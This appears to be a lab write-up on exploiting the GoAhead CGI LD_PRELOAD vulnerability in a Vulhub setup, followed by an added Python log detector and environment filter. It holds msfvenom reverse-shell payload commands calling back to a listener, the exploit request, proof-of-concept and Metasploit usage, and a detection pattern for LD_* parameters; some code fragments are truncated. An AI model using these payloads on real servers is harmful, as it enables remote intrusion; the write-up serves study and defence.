

    # msfvenom -a x64 -platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4444 -f elf-so -o payload.so

This is what a successful reverse shell with curl looks like in Wireshark:

    POST /cgi-bin/index?LD_PRELOAD=/proc/self/fd/0 HTTP/1.1

There's a really complicated explanation of the vulnerability here you can read if interested.

So why bother with a script when a one-liner suffices? I realised that although there was a POC script exploit by the author who discovered the vulnerability (Exploit-DB verified, also in a GitHub repo), it doesn't actually search for the cgi-bin endpoint for you. Yeah, curl assumes you know the endpoint is at the path /cgi-bin/index, which may not actually be the case; Vulhub tells us it's there. Incidentally this also applies to the Tiki Wiki's 3rd party module vulnerability, but I guess Tiki Wiki standardises it.

Here are my unsuccessful attempts with the POC makemyday.py before I understood what was going on.

    tid = threading.Thread(self.do_exploit(verify,))
      File "./makemyday.py", line 169, in do_exploit
      File "/usr/lib/python2.7/httplib.py", line 821, in connect
      File "/usr/lib/python2.7/socket.py", line 575, in create_connection
    socket.timeout: timed out

    Web Server# msfvenom -platform linux -a x64 -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4444 -f c
    No encoder or badchars specified, outputting raw payload
    Web Server# cat payload.c
    unsigned char buf
    int (*ret)() =
    Web Server# gcc -shared -fPIC payload.c -o .

      -h, --help   show this help message and exit
      -payload     shared object file to execute (defaults to .

And the successful way of using the EDB-verified exploit:

    makemyday.py -server 192.168.92.153 -port 8080 exploit -payload payload.so

This was also when I noticed that the POC exploit by the original author had a findcgi function; it required the user to specify a wordlist to brute-force search for the CGI endpoint, or to enter names manually via stdin.

    'findcgi', help='brute force cgi script names')
    findcgi.add_argument('-wordlist', nargs='?',
                         type=argparse.FileType('r'), default=sys.stdin,
                         help='list of cgi filenames to brute force (defaults to stdin)')

    for cginame in ():
        conn = httplib.HTTPConnection(, )
        conn.request("GET", "/cgi-bin/" + cginame)

There's another standalone Python exploit here which may work if you can figure out what it says and how to use it (it's in Chinese).

So how does the Metasploit module differ? First let's look at a demo of the Metasploit exploit in action:

    msf5 exploit(linux/http/goahead_ldpreload) > options

    Module options (exploit/linux/http/goahead_ldpreload):

       Name        Current Setting  Required  Description
       Proxies                      no        A proxy chain of format type:host:port
       RHOSTS      192.168.92.153   yes       The target address range or CIDR identifier
       SSL         false            no        Negotiate SSL/TLS for outgoing connections
       TARGET_URI                   no        The path to a CGI script on the GoAhead server

    Payload options (linux/x64/shell_reverse_tcp):

       Name   Current Setting  Required  Description
       LHOST  192.168.92.134   yes       The listen address (an interface may be specified)
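The request shape shown above, a query parameter named LD_PRELOAD that the CGI handler copies into the child process environment, is easy both to spot in access logs and to filter out before the environment is built. The Python below is an added example, not code from the original post, from GoAhead or from Metasploit; the log lines are constructed, and the hardened filter is an illustrative name check rather than GoAhead's actual patch.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in common log format (not captured from the page's lab).
SAMPLE_LOG = """\
192.168.92.134 - - [01/Jan/2020:10:00:00 +0000] "POST /cgi-bin/index?LD_PRELOAD=/proc/self/fd/0 HTTP/1.1" 200 12
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /cgi-bin/index?name=alice HTTP/1.1" 200 512
10.0.0.6 - - [01/Jan/2020:10:00:02 +0000] "GET /static/logo.png HTTP/1.1" 200 2048
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
ENV_NAME_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def loader_params(target):
    """Names of query parameters that would become LD_* loader variables in a CGI child."""
    query = urlsplit(target).query
    return [k for k, _ in parse_qsl(query, keep_blank_values=True)
            if k.upper().startswith("LD_")]


def detect(log_text):
    """Return (method, target, offending names) for each request carrying LD_* parameters."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        bad = loader_params(m.group("target"))
        if bad:
            hits.append((m.group("method"), m.group("target"), bad))
    return hits


def cgi_env_vulnerable(query):
    """Pre-fix behaviour: every query parameter is copied into the CGI environment as-is."""
    return {k: v for k, v in parse_qsl(query, keep_blank_values=True)}


def cgi_env_hardened(query):
    """Illustrative filter: drop malformed names and anything the dynamic loader reads."""
    env = {}
    for k, v in parse_qsl(query, keep_blank_values=True):
        if not ENV_NAME_RE.fullmatch(k) or k.upper().startswith("LD_"):
            continue
        env[k] = v
    return env
```

The POST body itself never needs inspecting for detection: the LD_PRELOAD=/proc/self/fd/0 parameter alone identifies the technique, which is why the module's TARGET_URI path does not matter to the log check.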
